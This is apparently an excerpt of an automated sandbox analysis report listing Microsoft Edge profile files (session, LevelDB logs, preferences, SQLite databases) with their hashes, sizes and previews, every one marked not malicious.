                                                                                                                                                                                                                                                                                                        Preview:SNSS.......7..$...........7..$......"7..$...........7..$.......7..$.......8..$.......8..$....!..8..$...............................7..$8..$1..,...8..$$...e3dc0814_49a0_4861_9d72_44df88d45629...7..$.......8..$....l.R........7..$...7..$.......................7..$....................5..0...7..$&...{901DFCA9-0933-49DD-B8AD-C128D9FD5AE7}.....7..$.......8..$....A..<...8..$....'...http://127.0.0.1:8000/254d3199/72f3a0b3.............!...x...................................................................................................IHQ.)..JHQ.).. .......8...............0.......................................................V...'...h.t.t.p.:././.1.2.7...0...0...1.:.8.0.0.0./.2.5.4.d.3.1.9.9./.7.2.f.3.a.0.b.3...................................8.......0.......8....................................................................... .......................................................P...$...d.7.a.a.1.5.7.9.-.9.9.b.e.-.4.d.9.5.-.9.a.c.e.-.c.c.8.d.2.b.4.7.2.9.9.1.................P...$...3.6
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):865
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.95214533412243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:39gsxUWM4YX/MTD04gWmlXjWlECOMlYcncecuIlVh+lt8lQEePlUnRUWMWrEPb:36WEE/KNXeECxG/4lOlZeP6Xry
                                                                                                                                                                                                                                                                                                        MD5:51DB173C1FBCAC32E6204398BFA2A5D7
                                                                                                                                                                                                                                                                                                        SHA1:7B89605D0E07161D783E1D83DA5C5A2E1488EB77
                                                                                                                                                                                                                                                                                                        SHA-256:048286D00076DA46ED96BDC02620DCA066485A5375F79F2A0B4B5AD0DF66CD28
                                                                                                                                                                                                                                                                                                        SHA-512:20600C7E15B228F6EC5B1C95ABE728A720E07F6867F50624C54CE1435FA22ED487CA1BFCB19BE5FDB502BA74BF3703992BEC6FEAB112AA6DE44C277ED169172D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SNSS.......9..$........"./.A..<...9..$....'...http://127.0.0.1:8000/254d3199/72f3a0b3.............!...x...................................................................................................IHQ.)..JHQ.).. .......8...............0.......................................................V...'...h.t.t.p.:././.1.2.7...0...0...1.:.8.0.0.0./.2.5.4.d.3.1.9.9./.7.2.f.3.a.0.b.3...................................8.......0.......8....................................................................... .......................................................P...$...d.7.a.a.1.5.7.9.-.9.9.b.e.-.4.d.9.5.-.9.a.c.e.-.c.c.8.d.2.b.4.7.2.9.9.1.................P...$...3.6.6.a.5.0.4.5.-.e.3.6.b.-.4.9.0.d.-.a.e.8.f.-.1.a.b.f.0.a.e.1.7.1.e.1.................'...http://127.0.0.1:8000/254d3199/72f3a0b3........."./....................."./............."./................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):347
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.151840323736089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMUAVq2PsZ23oH+Tcwt7Uh2ghZIFUt8ORQMcO0gZmw+ORQM2+NAIkwOsZ23oHT:72MDvkcYebIhHh2FUt8O2Mcu/+O2M1Nl
                                                                                                                                                                                                                                                                                                        MD5:9BBB51715ACFEA8A958D5430BD0FC1E6
                                                                                                                                                                                                                                                                                                        SHA1:40F3B3279BE617CFA313035E1B54842AFEA321FB
                                                                                                                                                                                                                                                                                                        SHA-256:71984DC9D63E5DFBA0490FAAF1B1E1D24A249E6E57DA222FD76C2AED71506C79
                                                                                                                                                                                                                                                                                                        SHA-512:5C94D5C3E08B8039D51A777DC12296A485B17BFA593A332EEC951282AF31C08380BF3BBBC13ABE49C29E86AA363DFB9A6385A5EFBF44AFFE77D209D032326EBE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.382 f74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-08:55:33.383 f74 Recovering log #3.2024/12/18-08:55:33.385 f74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):347
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.151840323736089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMUAVq2PsZ23oH+Tcwt7Uh2ghZIFUt8ORQMcO0gZmw+ORQM2+NAIkwOsZ23oHT:72MDvkcYebIhHh2FUt8O2Mcu/+O2M1Nl
                                                                                                                                                                                                                                                                                                        MD5:9BBB51715ACFEA8A958D5430BD0FC1E6
                                                                                                                                                                                                                                                                                                        SHA1:40F3B3279BE617CFA313035E1B54842AFEA321FB
                                                                                                                                                                                                                                                                                                        SHA-256:71984DC9D63E5DFBA0490FAAF1B1E1D24A249E6E57DA222FD76C2AED71506C79
                                                                                                                                                                                                                                                                                                        SHA-512:5C94D5C3E08B8039D51A777DC12296A485B17BFA593A332EEC951282AF31C08380BF3BBBC13ABE49C29E86AA363DFB9A6385A5EFBF44AFFE77D209D032326EBE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.382 f74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-08:55:33.383 f74 Recovering log #3.2024/12/18-08:55:33.385 f74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2084562280711255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72Tr+vkcYebvqBQFUt8O22W/+O2yV51cYebvqBvJ:7LkcYebvZg8ORW31cYebvk
                                                                                                                                                                                                                                                                                                        MD5:BA10E5673DA76ED7F30E1D6CD04BA345
                                                                                                                                                                                                                                                                                                        SHA1:A69955FB55097228D573B2B0C1CEBF27610E51DC
                                                                                                                                                                                                                                                                                                        SHA-256:239E5C34E0254DBE9ECFB6A4A0DF82941E2B0EAA1080D5DB9141FE6AAA85BC70
                                                                                                                                                                                                                                                                                                        SHA-512:FB71082EC42328236EE9FEC3D1EE2F320D540FC48C579E21261AD4813BA49E79D8E21C6DC6973AD9D0FD67189749B445EAF99F867603B0C29C64DAD4D4179E2C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.180 1c5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:30.195 1c5c Recovering log #3.2024/12/18-08:55:30.204 1c5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.226775261886322
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72mdvkcYebvqBZFUt8O201/+O2az51cYebvqBaJ:73kcYebvyg8OHdl1cYebvL
                                                                                                                                                                                                                                                                                                        MD5:B087ECB65D37D74293F72D166213C8C8
                                                                                                                                                                                                                                                                                                        SHA1:38E4FF4B3CC07D2E2550984C717A93EE8E0368CA
                                                                                                                                                                                                                                                                                                        SHA-256:E3E6877047A89E785DF55FF88BEB625DB633B0650F67D094FDB96B68EED1A21F
                                                                                                                                                                                                                                                                                                        SHA-512:5F63B19D47C7E9D8526169AF7D8A50B1DCCCDBE5A20064A13BC62876149D80F571C3013E1B97F824C953C86FD7416F7AC45823C4B86B216ACCA574706BCC2EF9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:31.793 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-08:55:31.794 1ae0 Recovering log #3.2024/12/18-08:55:31.808 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.226775261886322
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72mdvkcYebvqBZFUt8O201/+O2az51cYebvqBaJ:73kcYebvyg8OHdl1cYebvL
                                                                                                                                                                                                                                                                                                        MD5:B087ECB65D37D74293F72D166213C8C8
                                                                                                                                                                                                                                                                                                        SHA1:38E4FF4B3CC07D2E2550984C717A93EE8E0368CA
                                                                                                                                                                                                                                                                                                        SHA-256:E3E6877047A89E785DF55FF88BEB625DB633B0650F67D094FDB96B68EED1A21F
                                                                                                                                                                                                                                                                                                        SHA-512:5F63B19D47C7E9D8526169AF7D8A50B1DCCCDBE5A20064A13BC62876149D80F571C3013E1B97F824C953C86FD7416F7AC45823C4B86B216ACCA574706BCC2EF9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:31.793 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-08:55:31.794 1ae0 Recovering log #3.2024/12/18-08:55:31.808 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.240826026217858
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQB+q2PsZ23oH+TcwtpIFUt8ORQXWZmw+ORQDG3VkwOsZ23oH+Tcwta/WLJ:72B+vkcYebmFUt8O2XW/+O2DG3V51cYM
                                                                                                                                                                                                                                                                                                        MD5:869914EE4C1EDD7E315C0FC607C31DCC
                                                                                                                                                                                                                                                                                                        SHA1:74F5995FEADCCBB3F561AFC32457FA32B16E00D4
                                                                                                                                                                                                                                                                                                        SHA-256:322E8B8A7E0228693B8E6813B081B98015CA081676FCE9B396A1E40797D9D579
                                                                                                                                                                                                                                                                                                        SHA-512:F2E4FAFC9B2A7ADCBF46FD1C9AF05A7710232D5BC639485CD429E4B5FE33E7448055C171315BFA6F67662F0D8DD6E578FB03134FA3ED884F2A20D72D8C6705A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.271 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-08:55:33.274 195c Recovering log #3.2024/12/18-08:55:33.278 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0033769341339387224
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:ImtVuIlp1l5Pl/lll:IiVuIl71
                                                                                                                                                                                                                                                                                                        MD5:80879043305D6BE4AE43F7C711BF39EF
                                                                                                                                                                                                                                                                                                        SHA1:0522FFF052B29BAAC475277A53D9CA5FA38FAE4C
                                                                                                                                                                                                                                                                                                        SHA-256:79862A3169E97E7170F8D4BB473FB69C2A263EF97E640663C2E907906FB1BC27
                                                                                                                                                                                                                                                                                                        SHA-512:160451D9706986C0E6408F5735B68ED671143C0AF3AAD7659745828F2DF04BAADA628C47B33EA83EFA3A81EEF48DF13C151CC65541C02D7E6D54615B22C381D1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2648807415577232
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMpSAELyKOMq+8lMAjdnG2hVumv:Bq+n0Jp9ELyKOMq+8lVU2N
                                                                                                                                                                                                                                                                                                        MD5:B5BEE46329F1C0B8D880739604C06C0B
                                                                                                                                                                                                                                                                                                        SHA1:AD0B2BEB47C8D15781E2B7155D4A05064A700C29
                                                                                                                                                                                                                                                                                                        SHA-256:D4E323FDD57AED0DC684B10E4F751878AEB5FEDA3A323D88732C6C42BEAB0EB4
                                                                                                                                                                                                                                                                                                        SHA-512:E0DC1C011949BB7D04790508A46E415FEE71307000BAFC116400DD2121568EEDE33ABD14ED682C5B3061B5AFB3A0BF9F16FED30825073C67797C930522308980
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):10834
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2071741862979515
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Y+6kz3o88bV+FCHQArU2aPcKJ:stqvstQcV3jee+IbGOQCU2U
                                                                                                                                                                                                                                                                                                        MD5:85BE3181C71C44B3C3FA0C7D84EA5FB8
                                                                                                                                                                                                                                                                                                        SHA1:AEDACE195C5C0097B09536784ED5D052CFD69721
                                                                                                                                                                                                                                                                                                        SHA-256:C674D897B7CF4AA02F2E7C9329E751AFF8B1639C1CF0E5E7E675D849DC4CB14C
                                                                                                                                                                                                                                                                                                        SHA-512:7079FDD6B7BBBB371E30ACF260EE3E39730DF445B37567976B540BDCDF634DD39C07C02EA19A7B34E8941AD12333824386355EAAF0B02E71B42DD6A77F6DAE23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
